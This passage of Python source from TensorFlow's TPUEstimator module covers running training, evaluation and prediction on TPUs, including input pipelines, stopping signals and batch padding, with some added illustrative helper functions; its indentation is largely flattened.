creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
  data from the generator so that TPUEstimator can shut down the TPU system
  properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
  for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
Exporting `SavedModel` support on TPU is not yet implemented. So,
`export_savedmodel` is executed on CPU, even if `use_tpu` is true.
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
      model_dir: Directory to save model parameters, graph, etc. This can also
        be used to load checkpoints from the directory into an estimator to
        continue training a previously saved model. If `None`, the model_dir in
        `config` will be used if set. If both are set, they must be the same.
        If both are `None`, a temporary directory will be used.
      config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _TPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
            'Please adjust TPUConfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
    # Pass non-None params, as the wrapped model_fn expects it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _TPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu)
self._is_input_fn_invoked = None
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = util.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
      # Set the batch size in params first. This helps the user have the same
      # input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
if isinstance(kwargs['params'], hparam.HParams):
kwargs['params'].add_hparam(_BATCH_SIZE_KEY, batch_size_for_input_fn)
else:
kwargs['params'][_BATCH_SIZE_KEY] = batch_size_for_input_fn
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn():
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
    For TPUEstimator, we do not need to check the result type. `_InputPipeline`
    has a stronger check. The parent class's check generates a confusing
    warning message.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, by
# checking the self._is_input_fn_invoked bit, we can know, given the
# mode == PREDICT, it is the .predict API, not export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
ExamplesPerSecondHook(ctx.global_batch_size,
output_dir=self.model_dir),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': training.get_global_step()
},
every_n_secs=30)
] + input_hooks
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops have update_op and calls them one by
          # one. The real metric update_ops are invoked in a separate thread.
          # So, here we give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
        # directly and yields the element (via a generator) to the call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
        #    to form a single invocation. This avoids the issue where we might
        #    trigger multiple outfeeds incorrectly. To achieve this, `host_call`
        #    is placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
          host_ops = []  # Empty, we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
  # Check if there is at least one CrossReplicaSum operation in the graph.
  # This should be introduced by using the CrossShardOptimizer wrapper.
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
          'InternalError: Object can be captured only once. '
          'Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
          'Please file a bug.')
return self._object
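# --- Illustrative sketch (editor's addition, not part of the original module).
# `_CapturedObject` above exists so that a value produced inside a control-flow
# body function (e.g. the scaffold_fn captured by `_ModelFnWrapper`) can be
# read back outside of it. The minimal, TF-free example below shows the
# intended capture-inside / get-outside pattern.
def _example_captured_object_usage():
  """Captures a value inside a nested function and reads it outside (sketch)."""
  captured = _CapturedObject()
  def body():
    # Inside the (control-flow) body: record the object exactly once.
    captured.capture({'scaffold_fn': None})
    return 0
  body()
  # Outside the body: retrieve what was captured.
  return captured.get()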
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
                         'a bug.')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_lib._DatasetInitializerHook(iterator)
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
        # Unpack the single Tensor/dict argument as features. This is required
        # when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
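# --- Illustrative sketch (editor's addition, not part of the original module).
# The `_map_fn` built by `insert_stopping_signal` above repackages each dataset
# element into a dict with `features`, optional `labels`, and `signals` keys.
# The plain-Python mock below only illustrates that resulting structure; the
# real code produces Tensors and builds `signals` via `_StopSignals.as_dict`.
def _example_element_with_signals():
  """Returns a mock of the dict structure produced by _map_fn (sketch)."""
  return {
      'features': {'image': '<Tensor of shape [batch, height, width, channels]>'},
      'labels': '<Tensor of shape [batch]>',
      # For the user-provided dataset `stopping` is all False; for the single
      # extra batch appended by `_InputsWithStoppingSignals` it is all True.
      'signals': {'stopping': '<bool Tensor of shape [batch, 1]>'},
  }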
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
    # If this assertion failed, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
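# --- Illustrative sketch (editor's addition, not part of the original module).
# `_PaddingSignals` above pads a short final batch up to the full batch_size
# and records a 0/1 mask marking the padded rows so they can be sliced off
# again after prediction. The NumPy example below reproduces that idea for a
# single 1-D "feature" array, independent of TF (`np`, i.e. NumPy, as used
# elsewhere in this module).
def _example_pad_and_mask(values, batch_size):
  """Pads 1-D `values` to `batch_size`; returns (padding_mask, padded_values)."""
  values = np.asarray(values)
  real_batch_size = len(values)
  missing_count = batch_size - real_batch_size
  padded = np.concatenate(
      [values, np.zeros((missing_count,), dtype=values.dtype)])
  # 0 marks real rows, 1 marks padding, matching `_padding_mask` above.
  mask = np.concatenate([np.zeros((real_batch_size,), dtype=np.int32),
                         np.ones((missing_count,), dtype=np.int32)])
  return mask, padded
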